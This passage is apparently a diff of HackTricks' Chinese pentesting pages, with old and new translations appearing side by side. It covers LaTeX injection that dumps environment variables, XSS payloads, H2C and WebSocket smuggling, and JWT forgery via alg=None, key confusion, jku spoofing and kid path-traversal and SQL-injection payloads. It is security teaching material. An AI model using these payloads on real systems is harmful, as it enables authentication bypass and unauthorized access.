\immediate\write18{env | base64 > test.tex}
\input{text.tex}
@ -181,38 +182,39 @@ Google Sheets 提供了可用于带外数据外泄的函数:
```
### 跨站脚本攻击 <a href="#cross-site-scripting" id="cross-site-scripting"></a>
来自[@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
来自 [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## Ghostscript注入
## Ghostscript Injection
**检查** [**https://blog.redteam-pentesting.de/2023/ghostscript-overview/**](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)
## 参考资料
## 参考文献
* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
**Try Hard Security Group**
**努力安全小组**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# 升级头部劫持
# 升级头部走私
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
**努力安全小组**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -22,29 +23,29 @@
***
### H2C劫持 <a href="#http2-over-cleartext-h2c" id="http2-over-cleartext-h2c"></a>
### H2C 走私 <a href="#http2-over-cleartext-h2c" id="http2-over-cleartext-h2c"></a>
#### 明文HTTP2H2C <a href="#http2-over-cleartext-h2c" id="http2-over-cleartext-h2c"></a>
#### 明文 HTTP2 (H2C) <a href="#http2-over-cleartext-h2c" id="http2-over-cleartext-h2c"></a>
H2C**明文http2**通过将标准HTTP**连接升级为持久连接**偏离了短暂HTTP连接的常规。这种升级后的连接利用http2二进制协议进行持续通信而不是明文HTTP的单请求性
H2C称为 **明文 HTTP2**,通过将标准 HTTP **连接升级为持久连接**,偏离了瞬态 HTTP 连接的常规。这种升级的连接利用 http2 二进制协议进行持续通信,而不是明文 HTTP 的单请求性。
劫持问题的关键在于**反向代理**的使用。通常反向代理会处理并转发HTTP请求到后端然后返回后端的响应。然而当HTTP请求中存在`Connection: Upgrade`头部通常在websocket连接中看到反向**代理会维持客户端和服务器之间的持久连接**从而促进某些协议所需的持续交换。对于H2C连接遵循RFC需要存在三个特定的头部:
走私问题的关键在于使用 **反向代理**。通常,反向代理处理并转发 HTTP 请求到后端,然后返回后端的响应。然而,当 HTTP 请求中存在 `Connection: Upgrade` 头时(通常在 websocket 连接中看到),反向 **代理在客户端和服务器之间保持持久连接**,促进某些协议所需的持续交换。对于 H2C 连接,遵循 RFC 需要存在三个特定的头部:
```
Upgrade: h2c
HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA
Connection: Upgrade, HTTP2-Settings
```
漏洞出现在升级连接后,反向代理停止管理单个请求,假设其路由工作在连接建立后已完成。利用H2C Smuggling 可绕过反向代理在请求处理期间应用的规则如基于路径的路由、身份验证和WAF处理假设成功启动了一个H2C连接。
漏洞产生于在升级连接后,反向代理停止管理单个请求,假设其路由工作在连接建立后已完成。利用 H2C Smuggling 可以绕过在请求处理期间应用的反向代理规则,例如基于路径的路由、身份验证和 WAF 处理,前提是成功发起 H2C 连接。
#### 受影响的代理 <a href="#exploitation" id="exploitation"></a>
#### 易受攻击的代理 <a href="#exploitation" id="exploitation"></a>
该漏洞取决于反向代理对 `Upgrade` 和有时 `Connection` 头的处理。以下代理在代理传递期间固有地转发这些头,从而固有地启用 H2C 走私
该漏洞依赖于反向代理对 `Upgrade` 和有时 `Connection` 头的处理。以下代理在代理传递期间固有地转发这些头,从而固有地启用 H2C smuggling
* HAProxy
* Traefik
* Nuster
相反,这些服务在代理传递期间不固有地转发这两个头。但是,它们可能配置不安全,允许未经过滤地转发 `Upgrade``Connection` 头:
相反,这些服务在代理传递期间并不固有地转发这两个头。然而,它们可能被不安全地配置,允许不经过过滤地转发 `Upgrade``Connection` 头:
* AWS ALB/CLB
* NGINX
@ -57,54 +58,54 @@ Connection: Upgrade, HTTP2-Settings
#### 利用 <a href="#exploitation" id="exploitation"></a>
值得注意的是,并非所有服务器固有地转发用于符合 H2C 连接升级所需的头。因此,像 AWS ALB/CLB、NGINX 和 Apache Traffic Server 等服务器自然地阻止 H2C 连接。尽管如此,值得尝试使用不符合标准的 `Connection: Upgrade` 变体进行测试,该变体在 `Connection` 头中排除了 `HTTP2-Settings` 值,因为一些后端可能不符合标准。
需要注意的是,并非所有服务器都固有地转发 H2C 连接升级所需的头。因此,像 AWS ALB/CLB、NGINX 和 Apache Traffic Server 等服务器自然会阻止 H2C 连接。尽管如此,值得测试不合规的 `Connection: Upgrade` 变体,该变体从 `Connection` 头中排除了 `HTTP2-Settings` 值,因为某些后端可能不符合标准。
{% hint style="danger" %}
无论在 `proxy_pass` URL 中指定的具体 **路径** 是什么(例如 `http://backend:9999/socket.io`,建立的连接默认为 `http://backend:9999`。这允许与该内部端点中的任何路径进行交互,利用这种技术。因此,在 `proxy_pass` URL 中指定路径不限制访问。
无论在 `proxy_pass` URL 中指定的具体 **路径**(例如 `http://backend:9999/socket.io`是什么,建立的连接默认指向 `http://backend:9999`。这允许与该内部端点内的任何路径进行交互,利用此技术。因此,在 `proxy_pass` URL 中指定路径不限制访问。
{% endhint %}
工具 [**h2csmuggler by BishopFox**](https://github.com/BishopFox/h2csmuggler) 和 [**h2csmuggler by assetnote**](https://github.com/assetnote/h2csmuggler) 通过建立 H2C 连接,有助于尝试绕过代理施加的保护,从而访问被代理屏蔽的资源。
工具 [**h2csmuggler by BishopFox**](https://github.com/BishopFox/h2csmuggler) 和 [**h2csmuggler by assetnote**](https://github.com/assetnote/h2csmuggler) 通过建立 H2C 连接来帮助尝试 **绕过代理施加的保护**,从而访问被代理保护的资源。
有关此漏洞的更多信息,特别是关于 NGINX 的信息,请参 [**此详细资源**](../network-services-pentesting/pentesting-web/nginx.md#proxy\_set\_header-upgrade-and-connection)。
有关此漏洞的更多信息,特别是关于 NGINX 的信息,请参 [**此详细资源**](../network-services-pentesting/pentesting-web/nginx.md#proxy\_set\_header-upgrade-and-connection)。
## Websocket 走私
## Websocket Smuggling
与创建到通过代理可访问的端点的 HTTP2 隧道不同Websocket 走私建立了一个 Websocket 隧道,以绕过潜在的代理限制,并促进与端点的直接通信。
Websocket smuggling 与通过代理创建 HTTP2 隧道到可访问的端点不同,它建立一个 Websocket 隧道以绕过潜在的代理限制,并促进与端点的直接通信。
### 场景 1
在此场景中,一个提供公共 WebSocket API 和无法访问的内部 REST API 的后端被恶意客户端攻击,试图访问内部 REST API。攻击分为几个步骤
在此场景中,目标是一个提供公共 WebSocket API 的后端,以及一个无法访问的内部 REST API恶意客户端试图访问内部 REST API。攻击分为几个步骤
1. 客户端通过在标头中使用不正确的 `Sec-WebSocket-Version` 协议版本向反向代理发送升级请求。代理未能验证 `Sec-WebSocket-Version` 头,认为升级请求有效,并将其转发到后端。
2. 后端以状态码 `426` 响应,指示 `Sec-WebSocket-Version` 头中的不正确协议版本。反向代理忽略后端的响应状态,假设已准备好进行 WebSocket 通信,并将响应转发给客户端。
3. 结果,反向代理被误导以为客户端和后端之间已建立了 WebSocket 连接,而实际上,后端已拒绝了升级请求。尽管如此,代理保持客户端和后端之间的开放 TCP 或 TLS 连接,使客户端通过此连接无限制地访问私有 REST API。
1. 客户端通过向反向代理发送带有错误的 `Sec-WebSocket-Version` 协议版本的 Upgrade 请求来启动。代理未能验证 `Sec-WebSocket-Version` 头,认为 Upgrade 请求有效并将其转发给后端。
2. 后端以状态码 `426` 响应,指示 `Sec-WebSocket-Version` 头中的协议版本不正确。反向代理忽视后端的响应状态,假设已准备好进行 WebSocket 通信,并将响应转发给客户端。
3. 因此,反向代理被误导为相信客户端与后端之间已建立 WebSocket 连接,而实际上后端已拒绝 Upgrade 请求。尽管如此,代理仍在客户端和后端之间保持开放的 TCP 或 TLS 连接,允许客户端通过此连接无限制访问私有 REST API。
受影响的反向代理包括 Varnish它拒绝解决此问题,以及 Envoy 代理版本 1.8.0 或更早版本,后续版本已更改了升级机制。其他代理也可能受到影响
受影响的反向代理包括 Varnish该代理拒绝解决此问题,以及 Envoy 代理版本 1.8.0 或更早版本,后续版本已更改升级机制。其他代理也可能易受攻击
![https://github.com/0ang3el/websocket-smuggle/raw/master/img/2-4.png](https://github.com/0ang3el/websocket-smuggle/raw/master/img/2-4.png)
### 场景 2
此场景涉及一个具有公共 WebSocket API 和用于健康检查的公共 REST API 的后端,以及一个无法访问的内部 REST API。攻击更为复杂,包括以下步骤:
此场景涉及一个同时具有公共 WebSocket API 和用于健康检查的公共 REST API 的后端,以及一个无法访问的内部 REST API。攻击更复杂,涉及以下步骤:
1. 客户端发送 POST 请求以触发健康检查 API包括额外的 HTTP 头 `Upgrade: websocket`作为反向代理的 NGINX 仅基于 `Upgrade` 头解释此请求为标准升级请求,忽略请求的其他方面,并将其转发到后端。
2. 后端执行健康检查 API访问由攻击者控制的外部资源,返回带有状态码 `101` 的 HTTP 响应。一旦后端收到此响应并转发给 NGINX由于代理仅验证状态码它会被欺骗以为已建立 WebSocket 连接
1. 客户端发送 POST 请求以触发健康检查 API包括额外的 HTTP 头 `Upgrade: websocket`NGINX 作为反向代理,将其解释为基于 `Upgrade` 头的标准 Upgrade 请求,忽略请求的其他方面,并将其转发给后端。
2. 后端执行健康检查 API联系由攻击者控制的外部资源,该资源返回状态码为 `101` 的 HTTP 响应。此响应在被后端接收并转发给 NGINX 后,欺骗代理认为已建立 WebSocket 连接,因为它仅验证了状态码
![https://github.com/0ang3el/websocket-smuggle/raw/master/img/3-4.png](https://github.com/0ang3el/websocket-smuggle/raw/master/img/3-4.png)
> **警告:** 该技术的复杂性增加,因为它需要与能够返回状态码 101 的端点进行交互。
> **警告:** 此技术的复杂性增加,因为它需要能够与能够返回状态码 101 的端点进行交互。
最终NGINX 被欺骗以为客户端和后端之间存在 WebSocket 连接。实际上,并不存在这样的连接;健康检查 REST API 是目标。尽管如此,反向代理保持连接开放,使客户端通过它访问私有 REST API。
最终NGINX 被欺骗为相信客户端与后端之间存在 WebSocket 连接。实际上,并不存在这样的连接;健康检查 REST API 是目标。尽管如此,反向代理保持连接开放,使客户端能够通过它访问私有 REST API。
![https://github.com/0ang3el/websocket-smuggle/raw/master/img/3-5.png](https://github.com/0ang3el/websocket-smuggle/raw/master/img/3-5.png)
大多数反向代理都容易受到此场景的影响,但利用取决于外部 SSRF 漏洞的存在,通常被视为低严重性问题。
大多数反向代理在此场景中易受攻击,但利用取决于存在外部 SSRF 漏洞,通常被视为低严重性问题。
#### 实验室
检查实验室,测试两种场景:[https://github.com/0ang3el/websocket-smuggle.git](https://github.com/0ang3el/websocket-smuggle.git)
检查实验室以测试这两个场景 [https://github.com/0ang3el/websocket-smuggle.git](https://github.com/0ang3el/websocket-smuggle.git)
### 参考资料
### 参考文献
* [https://blog.assetnote.io/2021/03/18/h2c-smuggling/](https://blog.assetnote.io/2021/03/18/h2c-smuggling/)
* [https://bishopfox.com/blog/h2c-smuggling-request](https://bishopfox.com/blog/h2c-smuggling-request)
@ -117,16 +118,17 @@ Connection: Upgrade, HTTP2-Settings
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习与实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客攻击:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的公司广告或下载 HackTricks 的 PDF请查看 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,142 +1,143 @@
# JWT漏洞Json Web Tokens
# JWT Vulnerabilities (Json Web Tokens)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要攻破不可攻破的 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
**本文的部分内容基于这篇出色的文章:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology)\
**JWT渗透测试工具作者** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt\_tool)
**本帖部分内容基于以下精彩文章:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology)\
**JWT 渗透测试的优秀工具作者** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt\_tool)
### **快速成功**
### **快速胜利**
运行[**jwt\_tool**](https://github.com/ticarpi/jwt\_tool),选择`All Tests!`模式并等待出现绿色行
运行 [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) 并选择模式 `All Tests!`,然后等待绿色行输出
```bash
python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"
```
如果你很幸运该工具会发现某些情况下Web 应用程序未正确检查 JWT
如果你运气好的话工具会找到一些网络应用程序错误检查JWT的情况
![](<../.gitbook/assets/image (935).png>)
然后,你可以在代理中搜索该请求,或使用 jwt\_ tool 轻松查找该请求使用的 JWT
然后,你可以在你的代理中搜索请求或者使用jwt\_ tool转储该请求中使用的JWT
```bash
python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
```
你也可以使用[**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur)来从Burp发起JWT攻击。
您还可以使用 [**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur) 从 Burp 发起 JWT 攻击。
### 在不修改任何内容的情况下篡改数据
你可以仅篡改数据而保留签名,然后检查服务器是否在验证签名。尝试将你的用户名更改为"admin"
您可以仅篡改数据保持签名不变并检查服务器是否在检查签名。例如尝试将您的用户名更改为“admin”
#### **令牌是否被验证**
#### **令牌是否被检查**
要检查JWT签名是否被验证
要检查 JWT签名是否被验证:
* 错误消息表明正在进行验证;应仔细查看详细错误中的敏感信息。
* 返回页面的变化也表明正在进行验证。
* 没有变化表明没有验证;这时可以尝试篡改有效载声明。
* 错误消息表明正在进行验证;应检查详细错误中的敏感信息。
* 返回页面的变化也表明正在验证。
* 没有变化表明没有验证;这时可以尝试篡改有效载声明。
### 来源
通过检查代理的请求历史记录,确定令牌是服务器端生成还是客户端生成。
通过检查代理的请求历史,确定令牌是服务器端生成还是客户端生成非常重要
* 首次在客户端看到的令牌表明密钥可能暴露给了客户端代码,需要进一步调查。
* 在服务器端生成的令牌表明是一个安全的过程
* 从客户端首次看到的令牌表明密钥可能暴露于客户端代码中,需要进一步调查。
* 来源于服务器端的令牌表明过程是安全的
### 时长
### 持续时间
检查令牌是否持续超过24小时...也许它永不过期。如果有一个"exp"字段,请检查服务器是否正确处理它。
检查令牌是否持续超过 24 小时……也许它永远不会过期。如果有“exp”字段,请检查服务器是否正确处理它。
### 暴力破解HMAC密钥
### 暴力破解 HMAC 密钥
[**查看此页面。**](../generic-methodologies-and-resources/brute-force.md#jwt)
### 将算法修改为None
### 将算法修改为 None
将使用的算法设置为"None"并移除签名部分。
将使用的算法设置为“None”并移除签名部分。
使用Burp扩展调用"JSON Web Token"来尝试此漏洞并更改JWT中的不同值将请求发送到Repeater在"JSON Web Token"选项卡中可以修改令牌的值。也可以选择将"Alg"字段的值设置为"None")。
使用 Burp 扩展“JSON Web Token”尝试此漏洞并更改 JWT 内部的不同值(将请求发送到 Repeater在“JSON Web Token”选项卡中可以修改令牌的值。您还可以选择将“Alg”字段的值设置为“None”)。
### 将算法从RS256非对称更改为HS256对称CVE-2016-5431/CVE-2016-10555
### 将算法 RS256非对称更改为 HS256对称CVE-2016-5431/CVE-2016-10555
算法HS256使用密钥对每条消息进行签名和验证。\
算法RS256使用私钥对消息进行签名并使用公钥进行身份验证。
算法 HS256 使用密钥对每个消息进行签名和验证。\
算法 RS256 使用私钥对消息进行签名,并使用公钥进行身份验证。
如果将算法从RS256更改为HS256后端代码将使用公钥作为密钥然后使用HS256算法验证签名。
如果将算法从 RS256 更改为 HS256后端代码将使用公钥作为密钥然后使用 HS256 算法验证签名。
然后使用公钥并将RS256更改为HS256我们可以创建一个有效的签名。您可以检索执行此操作的Web服务器的证书:
然后,使用公钥并将 RS256 更改为 HS256我们可以创建一个有效的签名。您可以通过执行以下操作来检索 Web 服务器的证书:
```bash
openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
```
### 在标头中插入新的公钥
### New public key inside the header
攻击者在令牌的标头中嵌入一个新的密钥服务器使用这个新密钥来验证签名CVE-2018-0114
攻击者在令牌的头部嵌入一个新密钥,服务器使用这个新密钥来验证签名 (CVE-2018-0114)
这可以通过"JSON Web Tokens" Burp扩展完成。\
(将请求发送到Repeater在JSON Web Token选项卡中选择"CVE-2018-0114",然后发送请求)。
这可以通过 "JSON Web Tokens" Burp 扩展完成。\
(将请求发送到 Repeater在 JSON Web Token 标签中选择 "CVE-2018-0114" 并发送请求)。
### JWKS欺骗
### JWKS Spoofing
说明详细介绍了一种评估JWT令牌安全性的方法特别是那些使用"jku"标头声明的令牌。该声明应链接到一个包含令牌验证所需的公钥的JWKSJSON Web Key Set文件。
这些说明详细描述了一种评估 JWT 令牌安全性的方法,特别是那些使用 "jku" 头部声明的令牌。该声明应链接到包含令牌验证所需公钥的 JWKS (JSON Web Key Set) 文件。
* **评估具有"jku"标头的令牌**:
* 验证"jku"声明的URL确保它指向适当的JWKS文件。
* 修改令牌的"jku"值以指向一个受控的Web服务允许观察流量
* **监视HTTP交互**:
* 观察HTTP请求到您指定的URL指示服务器尝试从您提供的链接获取密钥。
* 在执行此过程时使用`jwt_tool`,关键是要更新`jwtconf.ini`文件将您个人的JWKS位置加入以便进行测试。
* **`jwt_tool`的命令**:
* 执行以下命令,使用`jwt_tool`模拟场景:
* **评估带有 "jku" 头部的令牌**
* 验证 "jku" 声明的 URL确保它指向适当的 JWKS 文件。
* 修改令牌的 "jku" 值,以指向一个受控的网络服务,从而允许流量观察
* **监控 HTTP 交互**
* 观察对您指定 URL 的 HTTP 请求,表明服务器尝试从您提供的链接获取密钥。
* 在使用 `jwt_tool` 进行此过程时,务必更新 `jwtconf.ini` 文件,添加您的个人 JWKS 位置以便于测试。
* **`jwt_tool` 的命令**
* 执行以下命令以使用 `jwt_tool` 模拟场景:
```bash
python3 jwt_tool.py JWT_HERE -X s
```
### Kid问题概述
### Kid Issues Overview
一个可选的标头声明称为`kid`用于识别特定密钥,在存在多个密钥用于令牌签名验证的环境中尤为重要。该声明有助于选择适当的密钥来验证令牌的签名。
一个可选的头部声明 `kid` 用于识别特定密钥,这在存在多个密钥用于令牌签名验证的环境中尤为重要。该声明有助于选择适当的密钥来验证令牌的签名。
#### 通过"kid"公开密钥
#### Revealing Key through "kid"
标头中存在`kid`声明时,建议搜索网络目录以查找相应文件或其变体。例如,如果指定了`"kid":"key/12345"`则应在Web根目录中搜索文件_/key/12345_和_/key/12345.pem_
头部中存在 `kid` 声明时,建议在网络目录中搜索相应的文件或其变体。例如,如果指定了 `"kid":"key/12345"`,则应在网络根目录中搜索文件 _/key/12345__/key/12345.pem_
#### 使用"kid"进行路径遍历
#### Path Traversal with "kid"
`kid`声明也可能被利用来浏览文件系统,潜在地允许选择任意文件。可以通过将`kid`值更改为目标特定文件或服务来测试连通性或执行服务器端请求伪造SSRF攻击。通过在jwt_tool中使用`-T`标志可以篡改JWT以更改`kid`值同时保留原始签名,如下所示:
`kid` 声明也可能被利用来遍历文件系统,可能允许选择任意文件。可以通过更改 `kid` 值以针对特定文件或服务来测试连接性或执行服务器端请求伪造 (SSRF) 攻击。通过使用 `-T` 标志在 jwt_tool 中篡改 JWT 以更改 `kid` 值,同时保留原始签名,可以实现如下所示:
```bash
python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
```
通过针对具有可预测内容的文件可以伪造有效的JWT。例如Linux系统中,已知包含值**2**的`/proc/sys/kernel/randomize_va_space`文件可以在`kid`参数中使用**2**作为对称密码用于JWT生成。
通过针对具有可预测内容的文件可以伪造有效的JWT。例如Linux系统中的`/proc/sys/kernel/randomize_va_space`文件,已知包含值**2**可以在`kid`参数中使用**2**作为JWT生成的对称密码
#### 通过"kid"进行SQL注入
#### 通过“kid”的SQL注入
如果`kid`声明的内容用于从数据库中获取密码,则可以通过修改`kid`负载来实现SQL注入。一个使用SQL注入修改JWT签名过程的示例负载包括:
如果`kid`声明的内容用于从数据库中获取密码,则可以通过修改`kid`有效负载来实现SQL注入。一个使用SQL注入来改变JWT签名过程的示例有效负载包括:
`non-existent-index' UNION SELECT 'ATTACKER';-- -`
改强制使用已知的秘密密钥`ATTACKER`进行JWT签名。
改强制使用已知的秘密密钥`ATTACKER`进行JWT签名。
#### 通过"kid"进行OS注入
#### 通过“kid”的OS注入
如果`kid`参数指定在命令执行上下文中使用的文件路径的情况下可能会导致远程代码执行RCE漏洞。通过向`kid`参数注入命令可以暴露私钥。一个用于实现RCE和密钥暴露的示例负载是:
